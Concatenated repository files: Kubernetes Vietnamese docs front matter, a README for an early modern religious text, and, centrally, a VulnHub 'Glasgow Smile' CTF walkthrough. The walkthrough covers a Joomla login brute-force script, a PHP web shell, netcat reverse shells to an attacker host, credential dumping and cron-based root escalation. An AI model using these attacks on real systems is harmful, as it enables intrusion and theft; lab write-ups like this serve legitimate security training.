title: Tài liệu Kubernetes
noedit: true
cid: docsHome
layout: docsportal_home
class: gridPage
linkTitle: "Home"
main_menu: true
weight: 10
hide_feedback: true
menu:
main:
title: "Tài liệu tham khảo"
weight: 20
post: >
<p>Tìm hiểu cách sử dụng Kubernetes với mức khái niệm, các hướng dẫn và tài liệu tham khảo. Bạn thậm chí có thể <a href="/editdocs/" data-auto-burger-exclude>đóng góp cho các tài liệu</a>!</p>
overview: >
Kubernetes là một công cụ điều phối container mã nguồn mở giúp tự động hóa triển khai, nhân rộng và quản lý các ứng dụng containerization. Dự án mã nguồn mở được host bởi Cloud Native Computing Foundation (<a href="https://www.cncf.io/about">CNCF</a>).
cards:
- name: concepts
title: "Hiểu rõ những căn bản"
description: "Tìm hiểu về Kubernetes và các khái niệm cơ bản của nó."
button: "Học các khái niệm"
button_path: "/docs/concepts"
- name: tutorials
title: "Dùng thử Kubernetes"
description: "Thực hiện theo các hướng dẫn để tìm hiểu cách triển khai các ứng dụng trong Kubernetes."
button: "Xem hướng dẫn"
button_path: "/docs/tutorials"
- name: setup
title: "Cài đặt một cluster"
description: "Kubernetes chạy dựa trên tài nguyên và nhu cầu của bạn."
button: "Cài đặt Kubernetes"
button_path: "/docs/setup"
- name: tasks
title: "Tìm hiểu cách sử dụng Kubernetes"
description: "Tra cứu các tác vụ phổ biến và cách thực hiện chúng theo các bước."
button: "Xem tác vụ"
button_path: "/docs/tasks"
- name: reference
title: "Tra cứu thông tin tham khảo"
description: "Duyệt qua thuật ngữ, cú pháp dòng lệnh, loại tài nguyên API và tài liệu công cụ cài đặt."
button: "Xem tài liệu tham khảo"
button_path: /docs/reference
- name: contribute
title: "Đóng góp cho tài liệu"
description: "Bất cứ ai cũng có thể đóng góp, cho dù bạn là người mới tham gia dự án này hay bạn đã có thời gian làm việc lâu dài với Kubernetes."
button: "Đóng góp cho tài liệu"
button_path: /docs/contribute
- name: download
title: "Tải xuống Kubernetes"
description: "Nếu bạn đang cài đặt Kubernetes hoặc nâng cấp lên phiên bản mới nhất, hãy tham khảo các ghi chú phát hành hiện tại."
- name: about
title: "Về tài liệu"
description: "Website này lưu tài liệu của phiên bản hiện tại và 4 phiên bản trước đây của Kubernetes."
---
| 39.724138 | 254 | 0.723524 | vie_Latn | 1.000007 |
9741974a08ca5459847f3bfd40b4f041a4a0554a | 16,390 | md | Markdown | _posts/2021-11-13-glasgowsmile.md | s4rgaz/s4rgaz.github.io | 8cc443a860a91e6cb8fbc12102a251e6305d6799 | [
"MIT"
] | null | null | null | _posts/2021-11-13-glasgowsmile.md | s4rgaz/s4rgaz.github.io | 8cc443a860a91e6cb8fbc12102a251e6305d6799 | [
"MIT"
] | null | null | null | _posts/2021-11-13-glasgowsmile.md | s4rgaz/s4rgaz.github.io | 8cc443a860a91e6cb8fbc12102a251e6305d6799 | [
"MIT"
] | null | null | null | ---
layout: post
title: VulnHub - Glasgow Smile 1.1
---
This machine was created by **mindsflee**, it was designed to be as real-life as possible, so it's important to have some encryption knowledge to solve this box.
## Information Gathering
### Host Discovery
An ICMP request detected the target machine on the local network, the script you can find it [here](https://github.com/s4rgaz/hdiscovery.git).
```bash
root@kali:~/glasgow$ python3 hdiscovery.py -t 192.168.179.0/24
192.168.179.165 is alive
```
### Port Scanning
A full TCP port scan with nmap revealed two available ports.
```bash
root@kali:~/glasgow$ nmap -v -n -T4 -p- 192.168.179.165 -oG nmap/all-tcp-ports.txt
...
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
```
### Service Enumeration
An Aggressive scan was performed on the target machine, but this doesn't reveal much information about the services.
```bash
root@kali:~/glasgow$ nmap -A -n -v -p22,80 192.168.179.165 -oN nmap/enum-services.txt
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
| 256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
|_ 256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
```
### Web Enumeration
As we can see, not much information is found on the main page of the web service.

So, I decided to run gobuster to brute force and find hidden web content.
```bash
root@kali:~/glasgow$ wfuzz --hc 404 -c -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://192.168.179.165/FUZZ
...
000006215: 301 9 L 28 W 319 Ch "joomla"
```
The tool found a joomla directory, I accessed it, and it redirected me to its home page.

Enumerating joomla I found a possible SQL Injection in one of its components, I tried to exploit it but it wasn't possible, so I decided to enumerate by other ways. The tool you can dowanload it [here](https://github.com/rastating/joomlavs).
```bash
root@kali:~/glasgow/joomlavs$ ./joomlavs.rb -u http://192.168.179.165/joomla/ -a
...
[+] Name: com_fields - v3.7.0
| Location: http://192.168.179.165/joomla/administrator/components/com_fields
| Manifest: http://192.168.179.165/joomla/administrator/components/com_fields/fields.xml
| Description: COM_FIELDS_XML_DESCRIPTION
| Author: Joomla! Project
| Author URL: www.joomla.org
[!] Title: Joomla Component Fields - SQLi Remote Code Execution (Metasploit)
| Reference: https://www.exploit-db.com/exploits/44358
```
## Exploitation
### Joomla Brute Force Login
I developed a python script to brute force the login form.
```python
#!/usr/bin/env python3
import requests
import re
import sys
from colorama import init,Fore
init()
green=Fore.GREEN
gray=Fore.LIGHTBLACK_EX
reset=Fore.RESET
def main():
url="http://192.168.179.165/joomla/administrator/index.php"
user='joomla'
s=requests.session()
def login(password):
r=requests.get(url)
token=re.findall("name=(.*)", r.text)
token=token[-1][1:33]
cookies=r.cookies.get_dict()
data={
'username':user,
'passwd':password,
'option':'com_login',
'task':'login',
'return':'aW5kZXgucGhw',
token:1
}
r=requests.post(url,cookies=cookies,data=data)
return r.text
wordlist=open("cewl.list").read().splitlines()
for passwd in wordlist:
if 'alert-message' not in login(passwd):
print(f"{green}[+] {user}:{passwd} {reset:20}")
sys.exit(0)
else:
print(f"{gray}[-] {user}:{passwd}{reset:20}", end='\r')
if __name__=="__main__":
main()
```
After trying to find the password of several possible users, it ocurred me to create a wordlist with cewl.
```bash
root@kali:~/glasgow$ cewl http://192.168.179.165/joomla -w cewl.list
```
Then, as a last try I used the joomla user to brute force and finally found the password.
```bash
root@kali:~/glasgow$ python3 jf.py
[+] joomla:Gotham
```
I logged in as joomla.

Ones on the dashboard we need to find a way to execute system commands, for this we follow the instructions below.
```bash
Extensions > Templates > Styles
```

In Styles click on "Beez3" under "Template".

We can edit one of these PHP files, in this case I will enter the web shell in the error.php file.

We verify if the command "id" is executed correctly.
```bash
root@kali:~/glasgow$ curl http://192.168.179.165/joomla/templates/beez3/error.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
To get a shell, first we need to start a netcat listener and run the following curl request.
```bash
root@kali:~/glasgow$ curl http://192.168.179.165/joomla/templates/beez3/error.php?cmd=$(php -r "echo urlencode('nc 192.168.179.1 443 -e /bin/bash');")
```
To upgrade to a full TTY shell, follow the steps below.
```bash
root@kali:~/glasgow$ nc -vlnp 443
listening on [any] 443 ...
connect to [192.168.179.1] from (UNKNOWN) [192.168.179.165] 35862
script -qc /bin/bash /dev/null
www-data@glasgowsmile:/var/www/html/joomla/templates/beez3$ ^Z
zsh: suspended nc -vlnp 443
root@kali:~/glasgow$ stty raw -echo;fg
[1] + continued nc -vlnp 443
<www/html/joomla/templates/beez3$ export TERM=xterm-256color
164data@glasgowsmile:/var/www/html/joomla/templates/beez3$ stty rows 39 columns
www-data@glasgowsmile:/var/www/html/joomla/templates/beez3$
```
Listing the joomla creds to connect to the MySQL database.
```bash
www-data@glasgowsmile:/var/www/html/joomla$ cat configuration.php
...
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'babyjoker';
public $db = 'joomla_db';
public $dbprefix = 'jnqcu_';
public $live_site = '';
public $secret = 'fNRyp6KO51013435';
...
```
Listing the MySQL databases.
```bash
www-data@glasgowsmile:/var/www/html/joomla$ mysql -u joomla -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3663
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| batjoke |
| information_schema |
| joomla_db |
| mysql |
| performance_schema |
+--------------------+
```
Switching to the "batjoke" database and listing its tables.
```bash
MariaDB [joomla_db]> use batjoke;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [batjoke]> show tables;
+-------------------+
| Tables_in_batjoke |
+-------------------+
| equipment |
| taskforce |
+-------------------+
2 rows in set (0.001 sec)
```
Retrieving the content of the "taskforce" table.
```bash
MariaDB [batjoke]> select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type | date | name | pswd |
+----+---------+------------+---------+----------------------------------------------+
| 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== |
| 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= |
| 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== |
| 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= |
| 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
| 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.002 sec)
```
In the output we can see that the passwords are in base64, we decode rob's password, since this user exists on the system.
```bash
www-data@glasgowsmile:/var/www/html/joomla$ ls /home/
abner penguin rob
www-data@glasgowsmile:/var/www/html/joomla$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d; echo
???AllIHaveAreNegativeThoughts???
```
I switched to the user rob, in his home directory there is a file called "Abnerineedyourhelp", that contains a ROT and base64 encoded message.
```bash
www-data@glasgowsmile:/var/www/html/joomla$ su rob
Password:
rob@glasgowsmile:/var/www/html/joomla$ id
uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rob@glasgowsmile:~$ ls
Abnerineedyourhelp howtoberoot user.txt
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat howtoberoot
_____ ______ __ _ _ _ ____ ____ _____ ____
|_ _| _ \ \ / / | | | | / \ | _ \| _ \| ____| _ \
| | | |_) \ V / | |_| | / _ \ | |_) | | | | _| | |_) |
| | | _ < | | | _ |/ ___ \| _ <| |_| | |___| _ <
|_| |_| \_\|_| |_| |_/_/ \_\_| \_\____/|_____|_| \_\
NO HINTS.
rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
```
To decode it I used this site [CyberCef](https://gchq.github.io/CyberChef/), as we see, the message is encoded in ROT1.

Then we decode abner's base64 encoded password.
```bash
rob@glasgowsmile:~$ echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d; echo
I33hope99my0death000makes44more8cents00than0my0life0
```
I switched to the user abner.
```bash
rob@glasgowsmile:~$ su abner
Password:
abner@glasgowsmile:/home/rob$ id
uid=1001(abner) gid=1001(abner) groups=1001(abner)
abner@glasgowsmile:/home/rob$ cd
abner@glasgowsmile:~$ ls
info.txt user2.txt
abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
abner@glasgowsmile:~$ cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
```
In abner's commands history a zip file called dear_penguis.zip is unzipped, this catches my attention.
```bash
abner@glasgowsmile:~$ cat .bash_history
...
unzip .dear_penguins.zip
cat dear_penguins
rm dear_penguins
...
```
That file was located in one of the web directories.
```bash
abner@glasgowsmile:~$ find / -name '.dear_penguins.zip' 2>/dev/null
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
```
A password is required to unzip the file, I used abner's password and it unzipped successfully.
```bash
abner@glasgowsmile:~$ unzip /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
Archive: /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
[/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip] dear_penguins password:
inflating: dear_penguins
abner@glasgowsmile:~$ ls
dear_penguins info.txt user2.txt
abner@glasgowsmile:~$ cat dear_penguins
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
```
As we can see the unzipped file contains penguin's password, so I switched to it.
```bash
abner@glasgowsmile:~$ su penguin
Password:
penguin@glasgowsmile:/home/abner$ id
uid=1002(penguin) gid=1002(penguin) groups=1002(penguin)
```
Penguin's home directory contains a hidden file named "trash_old".
```bash
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -la
total 332
drwxr--r-- 2 penguin penguin 4096 Jun 16 2020 .
drwxr-xr-x 5 penguin penguin 4096 Jun 16 2020 ..
-rwSr----- 1 penguin penguin 315904 Jun 15 2020 find
-rw-r----- 1 penguin root 1457 Jun 15 2020 PeopleAreStartingToNotice.txt
-rwxr-xr-x 1 penguin root 612 Jun 16 2020 .trash_old
-rw-r----- 1 penguin penguin 38 Jun 16 2020 user3.txt
```
```bash
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
#/bin/sh
# ( ( ) ( * ( (
# ( )\ ) ( )\ ) ( ( /( ( ( )\ ) ( ` )\ ))\ )
# )\ ) (()/( )\ (()/( )\ ) )\()))\))( ' (()/( )\))( (()/(()/( (
#(()/( /(_)((((_)( /(_)(()/( ((_)\((_)()\ ) /(_)((_)()\ /(_)/(_)))\
# /(_))_(_)) )\ _ )\(_)) /(_))_ ((__(())\_)() (_)) (_()((_(_))(_)) ((_)
#(_)) __| | (_)_\(_/ __|(_)) __|/ _ \ \((_)/ / / __|| \/ |_ _| | | __|
# | (_ | |__ / _ \ \__ \ | (_ | (_) \ \/\/ / \__ \| |\/| || || |__| _|
# \___|____|/_/ \_\|___/ \___|\___/ \_/\_/ |___/|_| |_|___|____|___|
#
#
exit 0
```
Listing the processes we can see that this script is executed, possibly due to a cronjob.
```bash
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ps auxwe
...
root 2761 0.0 0.1 2388 696 ? Ss 23:23 0:00 /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
...
```
## Privilege Escalation
### Cronjob
I edited the "trash_old" file, assigning it a netcat reverse shell.
```bash
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ vi .trash_old
```

We Then set up a netcat listener and wait a moment to receive our root shell.
```bash
root@kali:~/glasgow$ nc -vlnp 1337
listening on [any] 1337 ...
connect to [192.168.179.1] from (UNKNOWN) [192.168.179.165] 40602
python -c "import pty; pty.spawn('/bin/bash')"
root@glasgowsmile:~# ls
ls
root.txt whoami
root@glasgowsmile:~# cat root.txt
cat root.txt
▄████ ██▓ ▄▄▄ ██████ ▄████ ▒█████ █ █░ ██████ ███▄ ▄███▓██▓██▓ ▓█████
██▒ ▀█▓██▒ ▒████▄ ▒██ ▒ ██▒ ▀█▒██▒ ██▓█░ █ ░█░ ▒██ ▒▓██▒▀█▀ ██▓██▓██▒ ▓█ ▀
▒██░▄▄▄▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒██░▄▄▄▒██░ ██▒█░ █ ░█ ░ ▓██▄ ▓██ ▓██▒██▒██░ ▒███
░▓█ ██▒██░ ░██▄▄▄▄██ ▒ ██░▓█ ██▒██ ██░█░ █ ░█ ▒ ██▒██ ▒██░██▒██░ ▒▓█ ▄
░▒▓███▀░██████▓█ ▓██▒██████▒░▒▓███▀░ ████▓▒░░██▒██▓ ▒██████▒▒██▒ ░██░██░██████░▒████▒
░▒ ▒░ ▒░▓ ▒▒ ▓▒█▒ ▒▓▒ ▒ ░░▒ ▒░ ▒░▒░▒░░ ▓░▒ ▒ ▒ ▒▓▒ ▒ ░ ▒░ ░ ░▓ ░ ▒░▓ ░░ ▒░ ░
░ ░░ ░ ▒ ░▒ ▒▒ ░ ░▒ ░ ░ ░ ░ ░ ▒ ▒░ ▒ ░ ░ ░ ░▒ ░ ░ ░ ░▒ ░ ░ ▒ ░░ ░ ░
░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
Congratulations!
You've got the Glasgow Smile!
JKR{68028b11a1b7d56c521a90fc18252995}
Credits by
mindsflee
```
| 34.074844 | 388 | 0.626602 | eng_Latn | 0.587762 |
9741cb3c28f0a5172d2aa8517e2f199fec5021ec | 9,252 | md | Markdown | README.md | textcreationpartnership/A45654 | d4f6189e5b7c001bc2a556f02ec707fa8fbf5803 | [
"CC0-1.0"
] | null | null | null | README.md | textcreationpartnership/A45654 | d4f6189e5b7c001bc2a556f02ec707fa8fbf5803 | [
"CC0-1.0"
] | null | null | null | README.md | textcreationpartnership/A45654 | d4f6189e5b7c001bc2a556f02ec707fa8fbf5803 | [
"CC0-1.0"
] | null | null | null | #A brief discourse of mans estate in the first and second Adam Shewing these six points, I Man had a glorious beginning. II Man is much varied from himself. III Mans sin was caused by himself. IV Mans misery followes his non-dependence on God. V Man once off from God, and left to himself wanders irrecoverably. VI Saints by Christ, are in a very happy state. By Robert Harris once of Hanwell, now President of Trinity College in Oxon, and Doctor of Divinity.#
##Harris, Robert, 1581-1658.##
A brief discourse of mans estate in the first and second Adam Shewing these six points, I Man had a glorious beginning. II Man is much varied from himself. III Mans sin was caused by himself. IV Mans misery followes his non-dependence on God. V Man once off from God, and left to himself wanders irrecoverably. VI Saints by Christ, are in a very happy state. By Robert Harris once of Hanwell, now President of Trinity College in Oxon, and Doctor of Divinity.
Harris, Robert, 1581-1658.
##General Summary##
**Links**
[TCP catalogue](http://www.ota.ox.ac.uk/tcp/) •
[HTML](http://tei.it.ox.ac.uk/tcp/Texts-HTML/free/A45/A45654.html) •
[EPUB](http://tei.it.ox.ac.uk/tcp/Texts-EPUB/free/A45/A45654.epub) •
[Page images (Historical Texts)](https://historicaltexts.jisc.ac.uk/eebo-99828258e)
**Availability**
To the extent possible under law, the Text Creation Partnership has waived all copyright and related or neighboring rights to this keyboarded and encoded edition of the work described above, according to the terms of the CC0 1.0 Public Domain Dedication (http://creativecommons.org/publicdomain/zero/1.0/). This waiver does not extend to any page images or other supplementary files associated with this work, which may be protected by copyright or other license restrictions. Please go to https://www.textcreationpartnership.org/ for more information about the project.
**Major revisions**
1. __2008-05__ __TCP__ *Assigned for keying and markup*
1. __2008-10__ __SPi Global__ *Keyed and coded from ProQuest page images*
1. __2011-08__ __John Latta__ *Sampled and proofread*
1. __2011-08__ __John Latta__ *Text and markup reviewed and edited*
1. __2012-05__ __pfs__ *Batch review (QC) and XML conversion*
##Content Summary##
#####Front#####
A BRIEF DISCOURSE OF MANS ESTATE In the firſt and ſecond ADAM.Shewing theſe ſix Points,I Man had a g
1. TO Sir ANTHONY COPE Knight and Baronet.
1. A Table of the Texts and Doctrines contained in this Treatiſe.
#####Body#####
1. A BRIEF DISCOURSE OF Mans eſtate in the firſt and Second ADAM.
_ SECTION I. Excellency of mans eſtate, as created.
_ SECTION II. Snfull eſtate of man, as fallen.
_ SECTION. III. Mans ſin was cauſed by himſelf.
_ SECTION IV. Mans undoing is from his nondependence on God.
_ SECTION V. Man looſe from God is reſtleſſe in his wayes.
_ SECTION VI. Saints by Chriſt are in a very happy eſtate.
#####Back#####
1. THE TABLE.
Good Reader, be pleaſed to mend with thy pen, theſe few faults eſcaped in the enſuing diſcourſe.PAge
**Types of content**
* Oh, Mr. Jourdain, there is **prose** in there!
There are 327 **omitted** fragments!
@__reason__ (327) : illegible (315), foreign (5), illegible: in gutter (5), duplicate (2) • @__resp__ (315) : #PDCC (315) • @__extent__ (322) : 1 letter (215), 2 letters (73), 1 word (31), 3 letters (1), 1 page (2)
**Character listing**
|Text|string(s)|codepoint(s)|
|---|---|---|
|Latin-1 Supplement|àâ|224 226|
|Latin Extended-A|ſ|383|
|Latin Extended-B|Ʋ|434|
|General Punctuation|•—|8226 8212|
|Geometric Shapes|◊|9674|
|CJKSymbolsandPunctuation|〈〉|12296 12297|
##Tag Usage Summary##
###Header Tag Usage###
|No|element name|occ|attributes|
|---|---|---|---|
|1.|__author__|2||
|2.|__availability__|1||
|3.|__biblFull__|1||
|4.|__change__|5||
|5.|__date__|8| @__when__ (1) : 2012-10 (1)|
|6.|__edition__|1||
|7.|__editionStmt__|1||
|8.|__editorialDecl__|1||
|9.|__encodingDesc__|1||
|10.|__extent__|2||
|11.|__fileDesc__|1||
|12.|__idno__|6| @__type__ (6) : DLPS (1), STC (2), EEBO-CITATION (1), PROQUEST (1), VID (1)|
|13.|__keywords__|1| @__scheme__ (1) : http://authorities.loc.gov/ (1)|
|14.|__label__|5||
|15.|__langUsage__|1||
|16.|__language__|1| @__ident__ (1) : eng (1)|
|17.|__listPrefixDef__|1||
|18.|__note__|6||
|19.|__notesStmt__|2||
|20.|__p__|11||
|21.|__prefixDef__|2| @__ident__ (2) : tcp (1), char (1) • @__matchPattern__ (2) : ([0-9\-]+):([0-9IVX]+) (1), (.+) (1) • @__replacementPattern__ (2) : http://eebo.chadwyck.com/downloadtiff?vid=$1&page=$2 (1), https://raw.githubusercontent.com/textcreationpartnership/Texts/master/tcpchars.xml#$1 (1)|
|22.|__profileDesc__|1||
|23.|__projectDesc__|1||
|24.|__pubPlace__|2||
|25.|__publicationStmt__|2||
|26.|__publisher__|2||
|27.|__ref__|1| @__target__ (1) : http://www.textcreationpartnership.org/docs/. (1)|
|28.|__revisionDesc__|1||
|29.|__seriesStmt__|1||
|30.|__sourceDesc__|1||
|31.|__term__|2||
|32.|__textClass__|1||
|33.|__title__|3||
|34.|__titleStmt__|2||
###Text Tag Usage###
|No|element name|occ|attributes|
|---|---|---|---|
|1.|__back__|1||
|2.|__bibl__|11||
|3.|__body__|1||
|4.|__closer__|1||
|5.|__date__|1||
|6.|__dateline__|1||
|7.|__desc__|327||
|8.|__div__|12| @__type__ (12) : title_page (1), dedication (1), synopsis (1), discourse (1), section (6), index (1), errata (1) • @__n__ (6) : 1 (1), 2 (1), 3 (1), 4 (1), 5 (1), 6 (1)|
|9.|__epigraph__|6||
|10.|__front__|1||
|11.|__g__|768| @__ref__ (768) : char:EOLhyphen (751), char:V (4), char:EOLunhyphen (13)|
|12.|__gap__|327| @__reason__ (327) : illegible (315), foreign (5), illegible: in gutter (5), duplicate (2) • @__resp__ (315) : #PDCC (315) • @__extent__ (322) : 1 letter (215), 2 letters (73), 1 word (31), 3 letters (1), 1 page (2)|
|13.|__head__|25||
|14.|__hi__|1689| @__rend__ (6) : sup (6)|
|15.|__item__|73||
|16.|__label__|152| @__type__ (152) : milestone (152)|
|17.|__list__|16||
|18.|__milestone__|113| @__type__ (113) : tcpmilestone (113) • @__unit__ (113) : unspecified (113) • @__n__ (113) : 2 (39), 3 (30), 1 (28), 4 (12), 5 (2), 6 (1), 7 (1)|
|19.|__note__|170| @__place__ (170) : margin (170) • @__n__ (2) : * (2)|
|20.|__opener__|1||
|21.|__p__|354| @__n__ (4) : 1 (3), 2 (1)|
|22.|__pb__|170| @__facs__ (170) : tcp:32685:1 (1), tcp:32685:2 (2), tcp:32685:3 (2), tcp:32685:4 (2), tcp:32685:5 (2), tcp:32685:6 (2), tcp:32685:7 (2), tcp:32685:8 (2), tcp:32685:9 (2), tcp:32685:10 (2), tcp:32685:11 (2), tcp:32685:12 (2), tcp:32685:13 (2), tcp:32685:14 (2), tcp:32685:15 (2), tcp:32685:16 (2), tcp:32685:17 (2), tcp:32685:18 (2), tcp:32685:19 (2), tcp:32685:20 (2), tcp:32685:21 (2), tcp:32685:22 (2), tcp:32685:23 (2), tcp:32685:24 (2), tcp:32685:25 (2), tcp:32685:26 (2), tcp:32685:27 (2), tcp:32685:28 (2), tcp:32685:29 (2), tcp:32685:30 (2), tcp:32685:31 (2), tcp:32685:32 (2), tcp:32685:33 (2), tcp:32685:34 (2), tcp:32685:35 (2), tcp:32685:36 (2), tcp:32685:37 (2), tcp:32685:38 (2), tcp:32685:39 (2), tcp:32685:40 (2), tcp:32685:41 (2), tcp:32685:42 (2), tcp:32685:43 (2), tcp:32685:44 (2), tcp:32685:45 (2), tcp:32685:46 (2), tcp:32685:47 (2), tcp:32685:48 (2), tcp:32685:49 (2), tcp:32685:50 (2), tcp:32685:51 (2), tcp:32685:52 (2), tcp:32685:53 (2), tcp:32685:54 (2), tcp:32685:55 (2), tcp:32685:56 (2), tcp:32685:57 (2), tcp:32685:58 (2), tcp:32685:59 (2), tcp:32685:60 (2), tcp:32685:61 (2), tcp:32685:62 (2), tcp:32685:63 (2), tcp:32685:64 (2), tcp:32685:65 (2), tcp:32685:66 (2), tcp:32685:67 (2), tcp:32685:68 (2), tcp:32685:69 (2), tcp:32685:70 (2), tcp:32685:71 (2), tcp:32685:72 (2), tcp:32685:73 (2), tcp:32685:74 (2), tcp:32685:75 (2), tcp:32685:76 (2), tcp:32685:77 (2), tcp:32685:78 (2), tcp:32685:79 (2), tcp:32685:80 (2), tcp:32685:81 (2), tcp:32685:82 (2), tcp:32685:83 (2), tcp:32685:84 (2), tcp:32685:85 (2), tcp:32685:86 (1) • @__rendition__ (2) : simple:additions (2) • @__n__ (151) : 1 (1), 2 (1), 3 (1), 4 (1), 5 (1), 6 (1), 7 (1), 8 (1), 9 (1), 10 (1), 11 (1), 12 (1), 14 (2), 15 (1), 16 (1), 17 (1), 18 (1), 19 (1), 20 (1), 21 (1), 22 (1), 23 (1), 24 (1), 25 (1), 26 (1), 27 (1), 28 (1), 29 (1), 30 (1), 31 (1), 32 (1), 33 (1), 34 (1), 35 (1), 36 (1), 37 (1), 38 (1), 39 (1), 40 (1), 41 (1), 42 (1), 43 (1), 44 (1), 45 (1), 46 (1), 47 (1), 48 (1), 49 (1), 50 (1), 51 (1), 52 (1), 53 (1), 54 (1), 55 (1), 56 (1), 57 (1), 58 (1), 59 (1), 60 (1), 61 (1), 62 (1), 63 (1), 64 (1), 65 (1), 66 (1), 67 (1), 68 (1), 69 (1), 70 (1), 71 (1), 72 (1), 73 (1), 74 (1), 75 (1), 76 (1), 77 (1), 78 (1), 79 (1), 80 (1), 81 (1), 82 (1), 83 (1), 84 (1), 85 (1), 86 (1), 88 (1), 89 (1), 90 (1), 91 (1), 92 (1), 93 (1), 94 (1), 95 (1), 96 (1), 97 (1), 98 (1), 99 (1), 100 (1), 101 (1), 102 (1), 103 (1), 104 (1), 105 (1), 106 (1), 107 (1), 108 (1), 109 (1), 110 (1), 111 (1), 112 (1), 113 (1), 114 (1), 115 (1), 116 (1), 117 (1), 118 (1), 119 (1), 120 (1), 121 (1), 122 (1), 123 (1), 124 (2), 125 (2), 126 (1), 127 (1), 128 (1), 129 (1), 130 (1), 131 (1), 132 (1), 133 (1), 134 (1), 135 (1), 136 (1), 137 (1), 138 (1), 139 (1), 140 (1), 141 (1), 142 (1), 143 (1), 144 (1), 145 (1), 146 (1), 147 (1), 148 (1), 149 (1), 150 (1)|
|23.|__q__|13||
|24.|__salute__|1||
|25.|__seg__|154| @__rend__ (2) : decorInit (2) • @__type__ (152) : milestoneunit (152)|
|26.|__signed__|1||
|27.|__trailer__|3||
| 62.513514 | 2,863 | 0.636835 | eng_Latn | 0.373948 |
9742ea4832ddf8a780bf91bfa323f64c148b26f5 | 6,075 | md | Markdown | docs/preprocessor/init-seg.md | kyser/cpp-docs.ru-ru | 085e0717cfcd00870d62803aed74a2d641034138 | [
"CC-BY-4.0",
"MIT"
